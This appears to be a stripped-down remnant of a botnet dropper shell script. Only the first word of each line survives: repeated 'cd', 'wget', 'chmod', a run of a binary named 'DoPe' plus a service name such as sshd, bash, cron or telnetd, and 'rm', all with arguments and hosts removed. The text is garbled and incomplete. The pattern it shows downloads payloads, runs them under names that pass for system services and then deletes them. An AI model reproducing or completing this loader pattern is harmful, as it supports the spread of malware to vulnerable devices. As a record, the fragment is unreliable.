cd
cd
cd
cd
cd
wget
chmod
DoPentpd
rm
cd
cd
cd
cd
cd
wget
chmod
DoPesshd
rm
cd
cd
cd
cd
cd
wget
chmod
DoPeopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
DoPebash
rm
cd
cd
cd
cd
cd
wget
chmod
DoPetftp
rm
cd
cd
cd
cd
cd
wget
chmod
DoPewget
rm
cd
cd
cd
cd
cd
wget
chmod
DoPecron
rm
cd
cd
cd
cd
cd
wget
chmod
DoPeftp
rm
cd
cd
cd
cd
cd
wget
chmod
DoPepftp
rm
cd
cd
cd
cd
cd
wget
chmod
DoPesh
rm
cd
cd
cd
cd
cd
wget
chmod
DoPeshit
rm
cd
cd
cd
cd
cd
wget
chmod
DoPeapache2
rm
cd
cd
cd
cd
cd
wget
chmod
DoPetelnetd
rm
